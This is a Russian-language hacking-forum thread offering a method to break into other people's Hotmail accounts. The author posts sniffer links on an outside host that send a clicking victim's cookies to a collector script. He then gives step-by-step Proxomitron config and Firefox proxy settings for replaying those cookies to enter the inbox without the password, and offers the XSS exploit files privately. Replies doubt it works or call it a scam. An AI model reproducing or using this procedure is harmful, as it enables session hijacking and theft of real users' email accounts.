|
Взлом ХотМайла
Взлом ХотМайла
линк сниффера: http://devarsiv.org/picture5.jpg http://devarsiv.org/a.gif http://www.devarsiv.org/a.txt при нажатии на линк у жертвы уплывут куки на аддресс: www.devarsiv.org/alex/alex.php Подмена куки и вход в инбокс обходя пасс: через Mozila Firefox в настройках браузера:tools,option,connection setting,manual proxy configuration HTTP proxy вводим 127.0.0.1 port 8080 ставим у себя галочку на: use this proxy server for all protocols идиом дальше: качаем http://www.devarsiv.org/proxomitron.zip открываем подручным текстовым редактором в проксеметроне файл default.cfg находим строку: In = TRUE Out = TRUE Key = "cookie:hott" Match = "*" Replace = "" и меж кавычек в Replace = "" вставляем наши куки теперь в браузере Mozila Firefox вводим этот аддрecc:http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и попадаем в инбокс обходя пасс просьба не злоупотреблять приведённым примером всем удачного xака !! |
Чесно говоря ниче не понял!
При нажатие на какой линк у жертвы уплывают куки??? про XSS здесь ниче не написано! Можно чуть по поподробней про сам угон куков! |
Что то уж очень похоже на развод. Лень проверять - докажи что нет - уберу минус, воткну плюс
|
нажав на линк одной из этих ссылок:
http://devarsiv.org/picture5.jpg http://devarsiv.org/a.gif http://www.devarsiv.org/a.txt __________________________________________________ ___ куки уплывут на адрес: www.devarsiv.org/alex/alex.php подменяете куки в проксометроне. a в браузере Mozila Firefox пройдя по этой ссылке: http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и вы в инбоксе |
Цитата:
раньше срабатывала и на яхо, но на яхо багу недавно закрыли |
Автор, не скажу что это лажа, но с той статьи, откуда ты это взял, мог и полные пути выдрать. Попробуй зайди на http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes
Далее, где тут XSS, которая кукисы сдирает? Ты привел адреса снифферов, но их надо как-то применить |
статья моя сам написал, не откуда не выдёргивал.
объясню ещё раз, бага рабочая работает без проблем. эту ссылку: http://www.devarsiv.org/a.txt скиньте на хотмайл после нажатия на ссылку жертва попадет к себе-же в календарь сработает скрипт и куки уплывут на адрес: www.devarsiv.org/alex/alex.php далее: открываем текстовым редактором в проксометроне файл "default.cfg" находим строку In = TRUE Out = TRUE Key = "cookie:hott" Match = "*" Replace = "" и меж кавычек в Replace = " here" вставляем куки попaдём мы в инбокс только через Mozila Firefox изменим в настройках браузера:configuration HTTP proxy: на 127.0.0.1 порт 8080 после запустим сам проскометрон он должен будет ждать соединения на 8080 порту в браузере Мозила где вы изменили configuration HTTP proxy на 127.0.0.1 8080 вводим: http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и вы попaдаете в инбокс от куда угнали куки если не разберётесь стучите в асиу удачи!! |
Цитата:
чтоб жертва просто прошла по одной любой из этих ссылок: http://devarsiv.org/a.gif http://devarsiv.org/picture5.jpg http://www.devarsiv.org/a.txt а на этот адрес: www.devarsiv.org/alex/alex.php придут куки |
кто хочет ломануть мыло в домен-не хотмаил может воспользоваться уже готовым приведённым выше мной вариантом
сам сплойт и ксс на хотмайле выкладывать в паблик не буду,кто реально нуждается стучите могу скинуть все нужные файлы, для этого вам понадобится хост с поддержкой Php |
Короч я понял. Фишка в следующем. Верхний вариант -- это если ты уже в корень обленился, не собрать сплоит, не залить его и т.д. Нижний вариант, я имею ввиду предложение кому надо сплоит и т.п. -- это если ты не веришь, что это должно работать:))))))))
|
| Время: 01:57 |